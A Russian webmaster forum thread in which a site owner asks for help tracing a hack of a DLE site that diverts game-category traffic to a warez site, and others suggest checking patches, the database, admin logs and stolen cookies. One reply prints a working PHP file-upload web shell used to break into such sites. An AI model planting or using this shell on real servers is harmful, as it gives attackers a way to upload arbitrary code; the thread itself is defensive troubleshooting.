Форум Сайтостроение Безопасность

Взлом DLE - слив трафика

12
ES
На сайте с 07.10.2008
Offline
99
Eva_Smith
3070

Вобщем ситуация такая. На днях в статистике liveinternet во вкладке переходы на сайты были обнаружены переходы на сайт в зоне ру, игровой тематики (варез), траф сливается около месяца, примерно 100 человек на 4500 посещалки в день. Точка выхода с сайта - категория игр, с других разделов сайта трафик на них не идет. Проверка статистики того сайта (liveinternet общедоступна) показала что траф сливается не только с нашего сайта, но и с другого, возможно есть и еще доноры поменьше. Так вот, на втором сайте слив идет с категории games, остальные категории тоже как и у нас трафик не дают.

Проверяли изменения в файлах по дате за последний месяц - без результатов.

Отключались сторонние модули - без результатов.

Проверка сторонних ссылок в исходном коде - без результатов ("брали пробы" со страниц при авторицации на сайте, без и с правами админа).

Проверка редиректа при переходе с поисковиков гугл и яндекс - без результатов ("брали пробы" со страниц при авторицации на сайте, без и с правами админа)

Проверка шаблона сайта - без результатов.

Проверяем на шелл ai-bolit - сканирование продолжается

Проверка продолжается

Хотелось бы мнения специалистов в какую сторону копать, а то мозги уже кипят.

PS единственный "положительный" момент - найден предварительный хозяин сайта (анкета вконтакте), на который уходит трафик. Но как использовать данную информацию с пользой для себя неизвестно )))

Я
exarh
На сайте с 28.03.2010
Offline
503
exarh
#1
Eva_Smith:
Вобщем ситуация такая. На днях в статистике liveinternet во вкладке переходы на сайты были обнаружены переходы на сайт в зоне ру, игровой тематики (варез), траф сливается около месяца, примерно 100 человек на 4500 посещалки в день. Точка выхода с сайта - категория игр, с других разделов сайта трафик на них не идет. Проверка статистики того сайта (liveinternet общедоступна) показала что траф сливается не только с нашего сайта, но и с другого, возможно есть и еще доноры поменьше. Так вот, на втором сайте слив идет с категории games, остальные категории тоже как и у нас трафик не дают.

Проверяли изменения в файлах по дате за последний месяц - без результатов.
Отключались сторонние модули - без результатов.
Проверка сторонних ссылок в исходном коде - без результатов ("брали пробы" со страниц при авторицации на сайте, без и с правами админа).
Проверка редиректа при переходе с поисковиков гугл и яндекс - без результатов ("брали пробы" со страниц при авторицации на сайте, без и с правами админа)
Проверка шаблона сайта - без результатов.
Проверяем на шелл ai-bolit - сканирование продолжается

Проверка продолжается

Хотелось бы мнения специалистов в какую сторону копать, а то мозги уже кипят.

PS единственный "положительный" момент - найден предварительный хозяин сайта (анкета вконтакте), на который уходит трафик. Но как использовать данную информацию с пользой для себя неизвестно )))

НУ так засветите сайт редиски. А вообще владелец того сайта может и не знать. Просто он купил трафф и все, а откуда он и не смотрел.

Монетизируй (https://publishers.propellerads.com/#/pub/auth/signUp?ref_id=tnE) свой сайт с выгодой
ProLiant
На сайте с 07.12.2005
Offline
249
ProLiant
#2
exarh:
НУ так засветите сайт редиски. А вообще владелец того сайта может и не знать. Просто он купил трафф и все, а откуда он и не смотрел.

А может и вообще не быть владельцем того сайта и вообще никакого понятий не иметь о том, что вокруг него тучи сгущаются. :)

Выбирай оптимальный хостинг (http://cp.inferno.name/aff.php?aff=2053) для стабильного заработка на файловом трафе (https://espays.com/s.php?f=38). ;)
Курсор
На сайте с 04.01.2011
Offline
90
Курсор
#3

1. Проверьте сайт, все ли фиксы безопасности установлены? http://dle-news.ru/bags/

2. Проверьте исходный код новостей в редакторе.

3. Можно ссылочку на Ваш сайт, на крайняк в ЛС

Andreyka
На сайте с 19.02.2005
Offline
822
Andreyka
#4

Ищите в базе еще

Не стоит плодить сущности без необходимости
Курсор
На сайте с 04.01.2011
Offline
90
Курсор
#5
Andreyka:
Ищите в базе еще

Есть скрипт, не могу найти сейчас, классная вещь, чистит новости от вредоносного кода. Т.к обычно в новостях генерируют код по разному, сложно вычистить.

SP
На сайте с 04.02.2009
Offline
123
south_park
#6

Посмотрите логи админки, еще в управлении рекламой.

Один раз своровали куки, заходили и пихали в рекламу свою пакость, притом хитрые ставили хрень на небольшое время, несколько человек жаловались, я все прошманал ничего не нашел, думал вирусня у них, а потом вот нашел куда пихали...

Д
На сайте с 01.04.2012
Offline
132
Дадуда
#7
Eva_Smith:


Проверяли изменения в файлах по дате за последний месяц - без результатов.

Модифицируют назад дату. Не однократно встречал.

Как? Получают данные от сервера/хостинга.

Почта не на майл.ру случайно? Если там, меняйте данные все, включайте в настройках безопасности все возможное и главное запретить паралельные сессии.

VPN/SSD VPS в любой локации на выбор ( https://cp.inferno.name/cart.php ). Скидка 25% для новых заказов по промо-коду VESNA2024
ES
На сайте с 07.10.2008
Offline
99
Eva_Smith
#8

Обновились до актуальной версии движка. Прогресс нулевой. Либо шаблоны, либо база.

Вобщем пока никаких результатов. Мозгами трудно представить как из опеределенной категории уходит траф, если в исходном коде чисто. Хорошо, можно допустить некий промежуток времени между срабатыванием скрипта, или условие - ниразу не поймали переход "на своей шкуре"

PS хочется провести тендер на "лучший подзатыльник", за 500 долларов найдется как минимум 1 отморозок, живущий рядом с гавнюком.

exarh:
НУ так засветите сайт редиски. А вообще владелец того сайта может и не знать. Просто он купил трафф и все, а откуда он и не смотрел.

Если бы это было так, он бы не морозился на наше письмо, обратный адрес на все 100 показывал, что это не шутка, а письмо от администрации сайта.

Курсор
На сайте с 04.01.2011
Offline
90
Курсор
#9

Проверять сайт конечно есть смысл и айболитом и другими скриптами.

Вот к примеру как грузили shell, это не вредоносный код, но сайт ломали как нефиг делать:

<?php
error_reporting(0);
if (isset($_REQUEST['UploadOpen'])) {
    echo '<form action="" method=post enctype=multipart/form-data><input type=file name=uploadfile><input type=submit value=Upload></form>';
    $uploaddir = '';
    $uploadfile = $uploaddir.basename($_FILES['uploadfile']['name']);
    if (copy($_FILES['uploadfile']['tmp_name'], $uploadfile)) {
        echo "<h3>OK</h3>";
        exit;
    }else{
        echo "<h3>NO</h3>";
        exit;
    }
    exit;
}

И не один айболит не найдёт) А в логах есть)

ES
На сайте с 07.10.2008
Offline
99
Eva_Smith
#10

Как вариант была временно отключена возможность доступа к категории для гостей, из которой сливался трафик, что бы исключить базу из возможных источников вредноносного кода. Т. е. при переходе с поисковика, незарегистрированный пользователь не видел ни краткую ни полную новость, другими словами база не работала (а вернее таблицы с новостями), грузился только шаблон.

В итоге без изменений

Движок новый

База не при чем

Шаблон?....

Напишите если мы ошибаемся.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий